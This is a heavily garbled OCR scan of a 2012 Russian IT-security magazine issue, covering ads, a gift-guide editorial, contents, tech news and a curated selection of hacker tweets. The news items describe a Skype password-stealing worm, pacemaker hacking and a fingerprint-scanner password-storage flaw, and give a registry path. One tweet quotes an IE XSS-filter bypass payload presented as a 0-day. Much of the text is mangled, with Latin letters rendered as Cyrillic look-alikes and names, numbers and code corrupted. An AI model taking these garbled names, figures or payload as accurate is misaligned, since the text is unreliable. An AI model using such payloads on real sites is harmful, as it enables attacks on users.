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ЧЕМ ПОРАДОВАТЬ ГИКА? 
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АЗиЗ 2ЕМВООК^^ - НЕВЕРОЯТНЫЙ ОІТВАВООК^^. ВДОХНОВЛЕН ІМТЕІ. 

Тонкий и легкий. Элегантный и мощный. Ультрабук 2ЕNВ00К™ с процессором Іпіеі® Соге™ І7 
и ѴѴіпсІоѵѵз 8 не только следует за вами, но и ведет вас вперед. 

Откройте новые горизонты на ѵѵѵѵѵѵ.пеѵегоуаІпое.ги. 

Всемирная гарантия 2 года ѵѵи/ш.а$и$.ги 

Горячая линия АЗОВ: (495) 23-11-999, 8-800-1 00-2787 ѵѵѵш.а$и$пЬ.ги 



А81І8 2его Вгідііі Ооі: 30-дневная дополнительная гарантия отсутствия на экране неисправных ярких 
точек. Подробнее на ѵѵѵѵѵѵ.авивпЬ.ги/іЬсі • Эксклюзивная сервисная программа А81І8 Ріек ир & Веіигп 
для ноутбуков 11X21/11X31. Подробности наѵѵѵѵѵѵ.азизпЬ.ги/РІІП 
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ПОДАРКИ ДЛЯ ГИКА 



Удивить и по-настоящему порадовать ИТ-шника — задача не- 
тривиальная, сложная и подчас очень неблагодарная. Он привык 
к прагматичным подходам, и его не впечатлит какая-то там суве- 
нирная безделушка. Однако и с полезным подарком, скорее всего, 
выйдет промах — если тот не будет отличаться оригинальностью, 
нестандартностью или, как мы сейчас говорим, «гиковостью». 

В то же самое время очевидная сточки зрения обычного человека 
фиговина может вызвать дичайший восторг и умиление, если ее, 
к примеру, можно хитро за программировать. Вот та кой парадокс. 
Так что же подарить гику? Или больше того — чем порадовать 
себя на Новый год? Мы не стали изобретать какой-то универсаль- 
ный рецепт, а просто представили, что бы сами — как типичные 
гики — были рады увидеть поделкой. В результате получился 
гид по необычным подаркам гаджето-гикового плана: на разный 
бюджет и вкус, но с одним важным критерием — любой из подар- 
ков реально купить и доставить в Россию. И кое-что мы заказали 
в редакцию, чтобы порадоватьсебя :). 

Степан Ильин, 

главредХ 
*ѵуіиег.сот/5*ераЬ 
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В последней версии Ріге^ох 
появилась многофункциональная 
консоль. Теперьу разработчика 
есть возможность моментально 
выполнять рутинные операции. 
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Все новое за последний месяц 
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Иаскегіѵѵееіз 
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Хак-сцена втвиттере 





Колонка Стёпы Ильина 

Про мониторинг сервера 

Ргоо^о^сопсері 

Рисуем фальшивый браузер: фишинг через НТМ15 РиІІзсгееп АРІ 
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Реактивнее 

мозги 



Интервью с исполнительным 
директором ^е1;Вгаіп5 
Андреем Ивановым 
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ЧЕМ ПОРАДОВАТЬ ГИКА? 
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Удивительно, ноне для каждого из нас лучший подарок — 
это лазерный меч или набор ІЕСО, хотя и это тоже бывает приятно. 
Для всех остальных случаев мы составили список самых полезных, 
удобных или забавных гаджетов и аксессуаров, которые увидели свет 
в этом году. Надеемся, что каждый найдетздесь что-то себе по нраву. 






Н РС20ЫЕ 

036 Бсгеепкастинг 

Тестируем софт для записи скринкастов в ѴѴіпсІоѵѵз и Ыпих 

040 11.11 

Что представляет собой операционная система 
отКазрегзку ІаЬ? 

042 Недостающеезвено 

Подбираем идеальный пакетный менеджердля Мас05Х 
046 Недетский ОгираІ 

Настраиваем ОгираІ для себя, посетителей сайта и под 
поисковыемашины 

Н Х-МОВІЬЕ 

050 Андердоги 

Детальный обзор Ме6оо,ТІ2еп,\л/еЬ05 и Ріге^ох05 
054 Начало большого пути 

Оснащаем АпбгоісІ всем необходимым дляудобной 
и продуктивной работы 




058 ЕазуНаск 

Хакерские секреты простых вещей 

064 Обзор эксплойтов 

Анализ свеженьких уязвимостей 

070 Банкомат: история болезни 

Краткий курс препарации Аи^ота^есІ ТеІІег МасЫпе 

074 Робот для Веб 2.0 

Автоматизированный аудит веб-приложений 

078 Колонка Алексея Синцова 

Новыетрюкидля НеарЗргау 
080 Наказуемая беспечность 

Автоматизируем поискуязвимостей, вызванныхнекорректным 
использованием функций аІІосЛгее с ЮАРуШоп 

084 Х-Тооіз 

Уутилитдля исследователей безопасности 



н кодинг 

094 ][-проект:Стеганограф. Завершение 

Разрабатываем средства для сохранения и извлечения 
спрятанныхданных 

099 Задачи на собеседованиях 

Подборка интересныхзаданий, которые дают 
на собеседованиях 

102 Готовим приложениедляАпсІгоісІ 

Шесть полезных рецептов программерам 
106 МастеримсвойфреймворкнаРНР 

Разбираемся с паттерном проектирования МѴС и начинаем 
разработку 

Н АКАДЕМИЯ 

110 Школа НідЫоасІ.Урок№6 

Деплой и мониторинг 

н иміхоіо 

116 Большиегонки 

Обзор и сравнение производительности современных 
компиляторов 

121 Искусство сопряжения 

Пробрасываем железо по сети 

Н 5УЫ/АСК 

126 Сторожевой 7-гоуровня 

Знакомимся с возможностями популярныхѴѴеЬ Аррііса^іоп 
РігеѵѵаІІз 

132 Хитросплетениесвязей 

ѴѴіпсІоѵѵ5 5егѵег2012: новые возможности служб доменов 
Ас^іѵе Оігес^огу 

н РЕяяим 



Н МАШАЯЕ 

086 Малварьдля промышленнойавтоматики 

Исследуем возможности программируемых логических 
контроллеров сточки зрения вредоносного кодинга 

090 Детектив для безопасника 

Про малварь, которая сама собой не появляется 




136 Я всегда с собой беру 

Тестирование беспроводной точки доступа ТРЕМ Опе^ 
ТЕѴѴ-655ВР36 

137 С16АВУТЕОА-277Х-иР7 

Рогоѵегсіоскегз. Ву оѵегсіоскегз 

138 Игровойтандем! 

Тест игрового комплекта отЕоді1;есИ 

н юниты 

140 РАО 

Вопросы и ответы 

143 Диско 

8,5 Рб всякой всячины 

144 ѴѴѴѴѴѴ2 

Удобные ѵѵеЬ-сервисы 
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ВЫШЛА14-ЯВЕРСИЯДИСТРИБУТИВА 
51АСКѴѴАЯЕ, о чем с гордостью сообщил 
Патрик Фол ькердинг— основатель 
и главный разработчик проекта. 



ВИРУСНАЯ 
РАССЫЛКА В 5КУРЕ 

П0ЛЬ30ВАТЕЛИ>ѴІЫ00>Ѵ5-ВЕРСИИ5КУРЕ ПОД УГРОЗОЙ 

популярногоѴоІР-сервиса довольно давно не было проблем 
с малварью (во всяком случае серьезных), и это не могло 
длиться вечно. Первыми нечто странное за метил и специ- 
алисты компании «ВирусБлокАда». Оказалось, в России и СНГ 
обнаружился социальныйтроян, который распространяется через 
Бкуре и социальные сети («ВКонтакте», РасеЬоок, Тѵѵіиег). 

Ма л варь заражает пользовательские машины червем ѴѴогт. 
МдгВоІ (он же ОогкЬоі), притом «нехорошую» ссылку пользователи 
получают от имени своих авторизованных контактов. Схема работы 
зловреда в целом довольно обычна — жертва получает от одного 
из своих контактов в Бкуре ссылку, сопровождаемую текстом: «Это 
новый аватар твоего профиля?». При переходе по л инку загружает- 
ся 21Р-архив с вредоносным исполняемым файлом с расширением 
ехе (внутри кроется тот самый ѴѴогпп.МдгВоі).« ВирусБлокАда» 
отмечает, что после этого компьютержертвы включается в ботнет 
и участвует в 00о5-атаках. Также ѴѴогт. МдгВоІ ворует пароли 
отфайлообменников ІеІііЬіС 5т54П1е, Ѵір-ЛІе, от почтовых ящиков, 
различныхсервисов, соцсетей (УоиТиЬе, СтаіІ, РасеЬоок) и блокиру- 
ет доступ компьютера ксайтамантивирусныхкомпаний. 

Увы, да иных о распространении червя и статистики заражений 
пока нет, хотя «Лаборатория Касперского» и «Доктор Веб»уже под- 
твердили у грозу и призывают вовремя обновлять вирусные базы. 



Защититься, кстати, 
можно и просто 
отключив функцию 
управленияЗкуре 
другими програм- 
мами (в меню рас- 
ширенных настроек 
5 куре очистить 
пункт«Контрольдо- 
ступа программного 
интерфейса»). 




ВЗЛОМ, КОТОРЫЙ 

МОЖЕТ стоитьжизни 

СТРАШНОВАТАЯ ПРЕЗЕНТАЦИЯ С ВЯЕАКРОІНТ 

а ежегодной конференции Вгеакроіпі с докладом выступил 
исследователь Барнаби Джек, рассказав о том, что он на- 
учился дистанционно взламывать... кардиостимуляторы. 
Барнаби обнаружил, что кардиостимуляторы сразу нескольких 
производителей имеютопасную дырку в ПО — их можно заставить 
ударить«носителя»током напряжением 830 В, что почти наверняка 
приведет к летальному исходу. Для этого достаточно подать коман- 
дусноутбука, находящегося на расстоянии до 15 м отжертвы. 

Так как современные имплантаты управляются дистанционно, 
исследовательузнал команду, по которой приборы выдаютсвой се- 
рийный номер и номер модели. Затем Барнаби заменил ПО передат- 
чика для перепрограммирования кардиостимуляторов и выяснил, 
что имплантаты содержаттакже личные данные пациента, и даже 
нашел возможностьдоступа ксерверам производителей! Если 
загрузитьна серверы обновлений вредоносную «прошивку», это 
приведет к массовому за ражен ИЮ приборов, поясняет Барнаби. 

Онуже предупредил производителей приборовобуязвимости 
и сейчас разрабатывает программу ЕІесІгісРееІ, которая позволит най- 
тиустройства поблизости и дать команду на отключение или разряд. 









ШІТТЕЯ ВПЕРВЫЕ ПУСТИЛА 
ВХОД ВОЗМОЖНОСТЬ 
РЕГИОНАЛЬНОГО 
БЛОКИРОВАНИЯ КОНТЕНТА, 

ограничив германцев 
в доступе каккаунту одной 
неонацистской группы. 



В СОРЕВНОВАНИИ ТОРСООЕЯ 
ОРЕМ В КАТЕГОРИИ «АПГО- 
РИТМЬЬ^ в этом году одер- 
жал победу россиянин Егор 
Куликов— сотрудник питер- 
ского офиса «Яндекса». 



В АНОЯОІО ПОЯВИТСЯ 
ВСТРОЕННАЯ ФУНКЦИЯ 
АНТИВИРУСА, сообщает блог 
АпсІгоісІ Роіісе. Проверяться 
будут какуже установлен- 
ные, таки всезагружаемые 
приложения. 



КОМАНДАТНЕРІЯАТЕВАѴ 
ОТЧИТАЛАСЬВОФИЦИАЛЬ- 
НОМ БЛОГЕ О ТОМ, что трекер 
полностью отказался от фи- 
зическихсерверов в пользу 
нескольких облачных 
хостеров. 



ФБРЗАПРОСИЛОУКОРПО- 
РАЦИИ60061Е контактные 
данные сторонних Апсігоісі- 
разработчиков, и боодіе 
без вопросов предоставила 
списки. Неприятный пре- 
цедент. 
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Наши самые экологичные и самые экономичные принтеры. 

Наши новые высокопроизводительные принтеры серии Р5-43000М, созданные на базе технологии ЕС05У5, 
позволяют добиться исключительной экономии и чрезвычайно низкого воздействия на окружающую среду. 
Благодаря нашим долговечным технологиям, мы можем гарантировать, что ресурса барабана хватит на почти 
невероятные полмиллиона страниц. 

Этоозначает,чтовтечениесрокаслужбыустройстваединственнымрасходнымматериаломбудет,какправило, только 
тонер,чтосокращаетзатратыиуменьшаетколичествоотходов.Крометого,эталинейкаимеетсамыенизкиепоказатели 
энергопотребления* в своем классе. Среди характеристик можно также упомянуть скорость печати до 60 страниц 
в минуту, более совершенные показатели безопасности и гибкие возможности обработки документов. 

В целом, это линейка мощных, экономичных и экологичных принтеров повысит эффективность работы любого 
предприятия. 

* Типичное потребление энергии 



КУОСЕРА Ооситепі; Зоіиііопз РизБІа - РЬопе: +7 (495) 741 0004 - ѵѵѵѵѵѵ.куосегасІоситепІіБОІиІіопБ.ги 
КУОСЕРА Ооситепі; ЗоІиІіопБ Іпс. - ѵѵѵѵѵѵ.куосегасІоситепІіБОІиІіопБ.сот 
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МЕ6АМЕѴѴ8 К0ЛИЧЕСТВ0АКТИВНЫХП0ЛЬ30ВАТЕЛЕЙРАСЕВ00КПЕРЕВАЛИЛ03АМИЛЛИАРД,очемличносообщилМаркЦукербергнасвоейстранице. 



РІРЕРОХ 16-й ВЕРСИИ 
НЕГО КОНСОЛЬ 

П0ЧЕМУГИКИЛЮБЯТРтЕР0Х?ИЗ-ЗАТАКИХВ0ТН0В0ВВЕДЕНИЙ 

□ ыход новой стабильной версии Рігеі'ох 16 ознаменовался 
не только тем, чтодистрибутив оказался «бракованным» 
и Мо 2 ІІІабыла вынуждена снять его с официального сайта, 
выявив критическую уязвимость. Ту уязвимость быстро прикрыл и, 
а в дистрибутиве обнаружилось немало интересного. Мы остановим- 
ся подробнее на командной строке. 

Командная строка в Рігеі^ох вызывается нажатием комбинации 
клавиш<5ЫН + Р2> (можно также выбрать «ОеѵеІорегТооІЬаг» в меню 
«ѴѴеЬ Оеѵеіорег») и обладаетсистемой дополнения команди ихпара- 
метров, подробными подсказками итакдалее. Консольсозданатак, 
чтобы пользователь — хотя правильнее, пожалуй, сказать разработ- 
чик:) — мог печатать максимально быстро. Для ускорения процесса 
она будет завершать за него команды и параметры. Кроме того, это 
хорошая альтернатива шорткатам. 

Приведу пример: скажем, тебе нужно открыть командную строку 
в РігеЬх, но шорткатты забыл. Конечно, можно дотянуться до мышки 
и открыть командную строку через меню, но есть и другой путь: на- 
брать «сопзоіеореп» и консоль откроется. Фактически достаточно на- 
брать «соп<1аЬ>о<1аЬхеп1ег>», что будет даже быстрее. Помимо это- 
го, в ОеѵеІорегТооІз присутствуюткоманды бЬд и Ьгеак, есііі, іпзресЬ 
гезігеиІіК. Словом, все самое необходимое. Теперь к возможностям 
самой консоли. Допустим, тебе нужно проверить, как заголовки 
то 2 ІІІа.огд будут вы глядеть на небольшом экране телефона. Открыва- 
ем сайти набираем, к примеру, «іпзресі "#Ьоте-пеѵѵ5 ИЗ"», на от- 
крывшейся панели стилей видим, что размер шрифта для данного за- 
головка равен 28рх. Какэтобудетвыглядетьв разрешении320 х480? 
Набираем команду«ге5І2еІо320480»,запускается Резропзіѵе Оезідп 
Ѵіеѵѵ. Смотрим на результат и видим, что размер шрифта заголовка 
уменьшился до 24рх, согласно«заданным пожеланиям». 

Ноэтоотнюдьне всефишки консоли РігеЬх.Так, набрав команду 
соокіе,ты поймешь, почему эта командная строка называется «гра- 
фической». Запросив «соокіеіізіоп то 2 ІІІа.огд», увидишь все куки, 
которые на данный момент имеются для этого сайта. Можно удалить 
их, набрав «соокіе гетоѵеѴѴТ_РРС»или просто кликнув по кнопке 
«Ретоѵе». Анабрав на ппогіііа.огд «зсгеепзЬоіЬеасІіпд.рпд ОІ^аІзе 
Ы»,ты сохранишьтолькофайл Ьеасііпд.рпд, ожидая О секунд после 
команды, не включая в шот никаких окружающих элементов и окно 
браузера, толькоэлемент, выбранный в«Ы». Результатсохранит- 
ся вдиректорию«ОоѵѵпІоасІз». Консольпредоставляетподсказки 
для каждого параметра, расширенную версию которых можно по- 
читатьпотрадиционному Р1. Ещеодна полезная команда — радетосі. 
С ее помощью можно быстро изменить что-либо на странице. Можно 
посмотреть, какстраница выглядитбез классов, набрав«радетосІ 
гетоѵеаигіЬиІесІазз*», или выбрать, какойзаголовоксмотрится 
лучше, — «радетосі геріасе "Оиі оі" Оаіе Меѵѵз" "ТЬе Меѵѵ Ноіпезз"». 

Конечно, это далеко не все, естьещеасісіоп, ргеС ехрогі ЫтІ и куча 
другихполезностей. Новсе-таки рекомендуем лучшеодин разуви- 
деть и пощупать самостоятельно, чем сто раз прочитать. 



СОГЛАСНО ИССЛЕДОВАНИЮ КОМПАНИИ 50РН05 



АЗиЗРАОЕОМЕЗ 

ВТОРОЕ ПОКОЛЕНИЕЗАБАВНЫХТРАНСФОРМЕРОВ 

омпания А51І5 представила новую модель в линейке гибридных 
устройств — Рас1Ропе2. 0 первом РабРопе мы рассказывали 
в начале лета, но на всякий случай напомним — это своего рода 
матрешка. РабРопе сочетает в себе сразу три устройства — планшетный 
компьютер, нетбук и смартфон под управлением Апбгоіб. Смартфон 
может превращаться в 10,1 -дюймовый планшет, а после подключения 
к клавиатурной док-станции РабРопе Зіаііоп — в нетбук. Кстати, выход 
РабРопе 2 вовсе не означает, что первая модельтеперь исчезнет из про- 
дажи, А51І5 планирует, что устройства дополнят друг друга на рынке. 

Нового в РабРопе 2 много. В режиме смартфона и планшета РабРопе 
2 функционирует на базе Апбгоіб 4.0 ІС5, четырехъядерного процессора 
ОиаІсоттЗпарбгадоп 54 с частотой 1,5 ГГц и 2 Гб системной памяти; 
за графику отвечает подсистема Абгепо 320. Смартфон теперь оснащен 
новым 4,7-ДЮЙМОВЫМ экраном 5ирег ІР5+ с разрешением 1 280 х 720 
пикселей, который снабжен устойчивым к царапинам защитным сте- 
клом Согпіпд РіГ Немало времени на презентации уделили и 13-ме- 
гапиксельной камере, которая способна делать снимки со скоростью 
6 кадров в секунду и записывать видео в форматах 1 080р/30фз или 
720р/601"р5. Аккумулятор аппарата имеетемкость2140 мА*ч. В целом 
девайс стал чуть тоньше, но гораздо шире и выше. 

Также теперь, когда смартфон вставляется в планшет, телефон 
остается полностью виден окружающим — он держится в специальном 
углублении за счет салазок и механизма сцепки, больше нет никакой 
крышки. Это выглядит стильно — и нет, смартфон не выпадет, если 
планшет перевернуть вверх ногами :). Сама док-станция значительно 
«похудела», приобрела обтекаемые формы и теперь состоит из ІР5- 
экрана диагональю 10,1 дюйма с разрешением 1280 х 800 (149 ррі) 
и аккумуляторной батареи емкостью в 5000 мА»ч. Кстати, емкость 
аккумулятора док-станции первого РабРопе составляет 6600 мА*ч. 

Однакоу новинки есть и не очень приятная сторона:теперьдело 
ограничивается только планшетной док-станцией — клавиатура, 
а также электронная ручка, выступающая в роли ВІиеІооіЬ-гарнитуры, 
на презентации А51І5 отсутствовали (хотя ручка, вероятно, и заработает 
с РабРопе 2). По сути, пользователям на выбор предоставляются два 
разных «набора», а уж отдать предпочтение более мощному планшету 
или вообще нетбуку с клавиатурой — решать самому юзеру. 





СРЕДНЕЕ «ВРЕМЯ ЖИЗНИ>> О-ОАУ-ЭКСПЛОЙТОВ, 
ДО ОГЛАСКИ И ПАТЧЕЙ, СОСТАВЛЯЕТ 312 ДНЕЙ 
(ОТ 19 ДНЕЙ ДО 30 МЕСЯЦЕВ) 
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Встречайте - ѴѴІпсІоѵѵз 8 
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иснт ѴѴІ-РІ ВШЕТООТН МитМЕОІА ѵѵев-самева саво-реаоев 



© Владельцем товарного знака Місгобоі'і: и логотипа ѴѴіпсіоѵѵб 8, зарегистрированных на территории США и/или других стран, и владельцем авторских прав 

на его дизайн является корпорация Місгобоі"!:. 
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МЕСАМ ЕѴѴ8 МЕЖДУНАРОДНАЯОЛИМПИАДАПОИНФОРМАТИКЕ20иГОДАСОСТОИТСЯВРОССИИ,встроящемсянаукоградеИннополисвпригородеКазани. 



СКАНЕР ОТПЕЧАТКОВ — 
НЕЗАЩИТА, НО БРЕШЬ 

ОБНАРУЖЕНАНЕОБЫЧНАЯ УЯЗВИМОСТЬ 




разу в нескольких версиях ПО ОРЕК РгоІесІогЗиіІе 
для считывания отпечатков пальцев и авториза- 
ции по ним на машине обнаружена уязвимость. Эти 
программно-аппаратные системы поставляются в ком- 
плекте с предустановленным ПО на устройствах Асег, А505, 
ОеІІ, Іепоѵо, М5І, МЕС, Затзипд, 5опу, ТозЫЬа и других 
производителей. 

Началось все в августе, когда специалисты ЕІсотзоІ'І 
сообщили, что научились извлекать и расшифровывать 
пароли из реестра ѴѴіпсІоѵѵз, если юзер пользуется сканером 
ОРЕК. Дело втом, что ОРЕКРгоІесІогЗиіІе помещает пароль 
юзера в реестр ѴѴіпсІоѵѵз практически в открытом виде. О том, 
что хранить пароли таким образом нестоит, известно давно. 
ѴѴі п б 0ѴѴ5 д ел а ет та к, л и ш ь е сл и п о л ьз о в ател ь а кти в и ру ет 
автоматический вход вѴѴіпбоѵѵзбез ввода пароля. Так и по- 
лучилось в случае с СІРЕК. 

Так как ЕІсоітізоИ не сообщила подробностей, «копать» 
пришлосьуже другим исследователям. Американцы Адам 
Коудилл и Брэндон Уилсон нашли, где конкретно хранятся 
пароли и как они зашифрованы. Пароли лежат в НКЕУ_ 
10САІ_МАСНІМЕ\50РТѴѴАРЕ\ѴігШаІТокеп\Ра55рогА4.0\ 
РаззрогАЕхОаІа и хешируются М05. Для этого используется 
256-битный ключ, из-за экспортных ограничений часть хеша 
заменена нулями, то есть на самом деле ключ 56-битный. 





Хакеры уже 
выложили свою 
РоС-программудля 
извлечения паролей 
набіІНиЬ(ішуигк 
сот/срЬдд1б 1 и гро- 
зятся написать мо- 
дуль для Меіазріоіі. 



ПРОБЛЕМАСБЕЕІ 
ПРАКТИЧЕСКИ РЕШЕНА 



ЛИНУКСОИДЫ НАШЛИ выход 

□ начале года встанелинуксоидов поднялась не- 
шуточная паника, связанная с ІІЕРІ.Тогда стало 
известно, что для сертификации оборудования 
на совместимостьсѴѴіпбоѵѵзбМісгоБоНтребуетобязатель- 
ной активации по умолчанию режима безопасной загрузки, 
блокирующего загрузку систем, не имеющих заверенной 
цифровой подписи. Все это грозило большими проблемами 
Ыпих-сообществу, но, похоже, выходвсе-таки нашелся. 

Ыпих Роипбаііоп объявила о планах предоставления 
всем дистрибутивам универсального решения, которое 
упростит обеспечение поддержки работы на системах 
сактивным поумолчанию режимом безопасной загрузки. 
Ыпих Роипбаііоп подготовит промежуточный загрузчик, 
который будетзаверен ключом от компании Місгозоі'і. Код 
загрузчика разместят в біі-репозитории на кегпеі.огд, 
а позже и на сайте Ыпих Роипбаііоп. Заверенный первич- 
ный загрузчик будетзапускать файл Іоабег.еП, в котором 
разработчики дистрибутива смогут поставлять любой 
штатный загрузчик, например 6РІІВ2. Вторичный загрузчик 
может быть использован, даже если для него не созданы 
соответствующие цифровые подписи. После того какіоабег. 
еб получитуправление, дистрибутив продолжит за грузку 
в обычном режиме. Словом, разработчикам сторонних дис- 
трибов достаточно получить заверенный загрузчикот Ыпих 
Роипбаііоп и разместить его на отдельном разделе вместе 
с собственным загрузчиком (возможно также использова- 
ние на установочных СО/ОѴО и ЫѵеСО). 





МНОГОСТРАДАЛЬНУЮ 
КРИПТОВАЛЮТУ ВІТСОІН ОТ- 
НЫНЕ БУДЕТ ПРОДВИГАТЬ, 
ЗАЩИЩАТЬ И СТАНДАРТИ- 
ЗИРОВАТЬ ОРГАНИЗАЦИЯ 
ВІТСОІН РОиМОАТІОН, осно- 
ванная ведущим разработчи- 
ком Віісоіп-клиента Гэвином 
Андерсоном, пообразу и 
подобию Ыпих Роипбаііоп. 
Активисты предлагают 
частным лицам и компаниям 
пополнить ихряды, однако 
небесплатно, аза небольшую 
суммубиткоинами:). 




0СН0ВАТЕЛЬАМА20Н ДЖЕФФ 
БЕЗОС ПОДТВЕРДИЛ — ком- 
пания действительно продает 
планшеты и ридеры Кіпбіе по 
себестоимости. Атагоп любит 
нас,%изегпате%! 



НАСМЕНУУЖЕ ПРИВЫЧНОМУ 
ДЛЯ ТЕЛЕВИЗОРОВ И МОНИ- 
ТОРОВ РОИ НО РАЗРЕШЕНИЮ 

скоро придет Шіга НО, в четыре 
раза превышающее нынешний 
максимум— не менее 3840x21 60. 
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Программа «Путеш@твуй в стиле Три проводится с 1 ноября 2012 года по 31 января 2013 года включительно на территории РФ только для граждан 
РФ, достигших воЗраста?8 лет. Информация об организаторе программы, о правилах проведения, количестве призов по результатам ее проведения 
сроках, месте и порядкв^их получения на интернет-сайте ѵѵѵѵѵѵ.Шзоѵка.ги. Реклама. 
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МЕ6АМЕѴѴ5 



АРРІЕЗАПАТЕНТ0ВАЛА«ДЕК0РАТИВН0Е ОФОРМЛЕНИЕПОРТАТИВНОГОУСТРОЙСТВАСДИСПЛЕЕМ», проще говоря— дизайніРасІ. 




АМОРОЮ4.2 

И«ГУГЛОГАДЖЕТЫ» 

ПРЕДСТАВЛЕНЫ НОВЫЕ НЕХ05 
И ОБНОВЛЕННЫЙ АНОКОЮ 

онецоктября ознаменовался сразу не- 
сколькими громкими анонсами в стане 
Андроид. Каки планировалось, боодіе 
представила новую версию своей мобильной 
операционной системы — АпсІгоісІ4.2 (кодовое 
имя по-прежнему ^еIIу Веап). Нововведений 
оказалось немало, вот наиболее интересные 
из них. 

Наконец-тоуАпбгоісІ появился много- 
пользовательский режим (правда, только 
для планшетов), тоестьпроблема совместного 
использования устройств решена. Теперь 
для каждой учетной записи существует свой 
набор приложений (одно и тоже ПО могут 
установить сразу несколько человек, ведь все 
данныехранятся отдельно). Также под каждого 
пользователя настраиваются рабочий стол, 
обои, виджеты итакдалее. Есть поддержка 
быстрого переключения междуучетными 
записями, переключаться можно прямое экра- 
на блокировки. 

Еще одно приятное новшество — клавиату- 
ра с поддержкой «жестового» ввода, работа- 
ющего по образуй подобию 5ѵѵу ре. Пользова- 
телю достаточно просто скользить пальцем 
по буквам, отрывая палец от экрана после 
каждого слова. Есть и функция предугадыва- 
ния слов, предлагающая варианты ввода. 

Тем, кто любитфотографировать, понра- 
вится новая функция РЬоІоЗрЬеге, предназна- 
ченная для создания 30-панорам в духе Соодіе 
Зігееі Ѵіеѵѵ. Созданные панорамы можно про- 
сматриватьна смартфоне, передавать в Соодіе 
РІиз или даже загружать непосредственно 
в боодіе Марз! Кстати, сам интерфейс камеры 
тоже подвергся изменениям: в частности, до- 
бавлены новые фильтры (привет, Іпзіадгат). 

Также стоитупомянутьо протоколе МігасазЕ 
благодаря которому можно транслировать 
потоковое видео прямо на телевизор. Правда, 
для этого понадобится специальный адаптер, 
подключающийся кпорту НОМІ нателевизоре. 
Его стоимость составляет около 100 долларов, 
но компания 16 заявила, что в будущих НОТѴ 
новый протокол будетработатьбез дополни- 
тельныхустройств. 



Ужеанонсированы и первыеустройства, 
работающие под управлением обновленной ОС. 
Это два «гуглогаджета» — смартфон Мехиз4 
от компании 16 и планшет Мехиз 10, созданный 
в партнерстве с баппзипд. 

Смартфон построен на четырехъядерном 
1,5- ГГц процессоре Оиаісопшті бпарсігадоп 
54 Рго с графикой Абгепо 320 и оснащен 4,7" 
дисплеем Тгие НО ІР5 РІиз (1280 х 768). Объем 
ОЗУ равен 2 Гб, флеш -памяти 8 или 16 Гб, но- 
винка также несет на борту чип МРС. Поддерж- 
ки ІТЕ нет, только ВІиеІооіЬ и ѴѴі-Рі. Емкость 
аккумулятора 2100 мА*ч (чутьбольше Ібчасов 
в режиме разговора и до 300 часов в режиме 



ожидания). Есть возможность беспроводной за- 
рядки. Цена у Мехиз 4 весьма приятная — 299$ 
за модель 8 Гб и 349 $ — за модель 16 Гб. 

Планшет, в свою очередь, интересен экра- 
ном 10,1 "типа Р15 с огромным разрешением 
2560 X 1600 (16:10)! Плотность точек при этом 
достигает 300 брі. Новинка работает на мощ- 
ном двухъядерном процессоре сархитектурой 
Сог1ех-А15 с четырехъядерной графикой Маіі 
Т604. Здесьтакже отсутствует поддержка ІТЕ 
(версия с ІТЕ ожидается позже), но зато есть ѴѴі- 
Рі и целых два чипа МРС — на лицевой и тыльной 
сторонах корпуса. Стоимость модели Мехиз 10 
с 16 Гб составляет 400, а с 32 Гб — 500 долларов. 




ХАКЕРСКАЯ ГРУППАТНРЕЕМиЗКЕТЕЕРЗ ДОЛОМАЛА Р53 



новый ДЖЕЙЛ БРЕЙК Р53 УЖЕ 
НЕ ИСПРАВИТЬ ПАТЧЕМ: ХАКЕРЫ 
ДОБРАЛИСЬ ДО КРИПТОГРАФИЧЕСКИХ 
КЛЮЧЕЙ УРОВНЯ ІѴО (СЕѴЕС2ЕК0І 
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#Ьаскег1;ѵѵее1;5 



Алексей Синцов 






Гас1Іі«сНПеІсІ 

Мне нравится, когда безопасни- 
ки думают, что имеют все ответы 
и либо их путь, либо никакой. 

А вообще-то не, не нравится... 



ГасШиНПеШ 

«Критичный» должно исполь- 
зоваться только для удаленных 
компрометаций, не требующих 
аутентификации, не для маркетинга. 

ИД Комментарий: 

Ну, тут можно поспорить с точностью 
определения, но это факт: все чаще раз- 
личные секурити-компании преувеличивают 
важность своих «открытий». 



(аіоегпсИеп 

Ладно, теперь любой РоС-файл 
я буду называть СУВЕРѴѴАР. 
Тогда это будет выглядеть так: 
./СУВЕРѴѴАР -I ::1 



(ВзИггз 

Наверно, надо перестать про- 
верять попавшиеся на глаза 
формы на Х55, чтобы не тра- 
тить время на отправку репортов. Или про- 
сто не отправлять... 

Н Комментарий: 

На самом деле время тут тратится 
на проверку «всех форм»... Иногда захо- 
дишь на сайт на одну минуту, просто что-то 
надо узнать, а сидишь там целых десять 
минут, проверяя векторы ХХ5/50Ы, и упаси 
нас отХХЕ... 



Оряогата 

Касперский про свою защищен- 
ную ОС: «маленькая, написана 
с нуля, основана на какой-то 
уже умершей ОС. Для промышленных АСУ. 
Деталей не знаю». 




(Зазіпізоѵ 

5ЕН0Р включен в ІЕ9 по умол- 
чанию. А все существующие 
техники обхода бесполезны (они 
для неАВЕР или неОЕР). 

Н Комментарий: 

А меня никогда не было в ленте, вот 
вам. А вы знали, что 5ЕН0Р включается 
в реестре для всей ОС, но для ІЕ9 эта заме- 
чательная техника включена по умолчанию? 
Думаю, это единственный браузер с работа- 
ющим по умолчанию 5ЕН0Р. Как бы ни руга- 
ли ІЕ, но получается, что проэксплойтить 
5ЕН без утечки адресов пісііі или стека — 
нереально. 



га_?гедо_ 

#рѵѵпіит #ріпкіеріе 5Ѵ6 изе- 
аі'Іег-І'гее и абуз ІРС на запись 
файла? Мило :-) Это более реа- 
листично, чем цепочка из 200 багов, как это 
было в прошлый раз. 

Н Комментарий: 

Сергей Глазунов не единственный 
«тинейджер-хакер», в этом году конкурс 
выиграл Ріпкіе Ріе, заюзав всего две баги. 
Эффективно и реалистично, а потому круто 
8 ) 



ГаіООги 

Сегодня АбоЬе выпустили 
РеабегХІ, включая 49 (!) краш- 
фиксов безопасности, о кото- 
рых сообщил я и ЙдупѵаеІ в 02, 03 2012. 

Не переключайте каналы. 

□ Комментарий: 

На самом деле 49 багов за шесть 
месяцев — это ураган. Респект! 



ГаХ55Ѵес«ог 

Обход фильтра Х55 в ІЕ, 0-дэй: 

<5 с гі рі/% О О % О О ѵ% О О % о 0>а I е гі (/га 
)аскппа5а/)</5спр1> и %с0 
//(%000000%0ба1ег1(1)// #1Е #0бау 
іп5ІаЬЫаЬ5.огд/?р=499 



ГаіегетіаНд 

«Использование НТМЕ5 и пол- 
, , і ноэкранного АРІ для фишинг- 
атак» ЬіЕ!ѵ/ 0РВ2]5 < Ох ты ж 
Ёжик! Выглядит хорошо! 

Н Комментарий: 

Забавный способ фишинга с возмож- 
ностями НТМЕ5. 



